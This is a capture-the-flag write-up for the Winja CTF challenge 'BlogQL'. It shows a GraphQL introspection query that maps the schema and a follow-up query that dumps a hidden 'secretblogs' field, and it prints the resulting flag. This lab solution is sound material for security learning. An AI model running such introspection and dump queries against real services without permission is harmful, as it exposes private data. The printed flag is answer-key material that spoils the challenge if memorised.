CTFtime.org / Winja CTF | c0c0n 2021 / BlogQL / Writeup

# BlogQL
* after research and read chall content we will figure out it use graphql as database :)
## Target
* [\*] Get Flag :)
## Solution
* First of all we know its uses graphql to make sure of that go to /graphql?query={PAYLOAD}
* we will search for payload to get all tables name so we can find where is the flag
`query {
__schema {
queryType {
fields {
name
type {
kind
ofType {
kind
name
}
}
}
}
}
}`
* after excute the payload above we will find this
![](https://raw.githubusercontent.com/MustafaRaad7/Winja-CTF-Writeups/main/BlogQL/images/1.png)
* **Yeyyy.. We are too close :)**
* now all we have to do fetch all data from it :D
`{
secretblogs{
content
}
}`
![](https://raw.githubusercontent.com/MustafaRaad7/Winja-CTF-Writeups/main/BlogQL/images/2.png)
* **flag : flag{ea6a3da74909e79a8aa38005c6810893_d1d_In7r0speC7i0n_wORk_F0r_gRaPhqL}**

Original writeup (https://github.com/MustafaRaad7/Winja-CTF-Writeups/blob/main/BlogQL/README.md).

BlogQL

Comments

Sign in with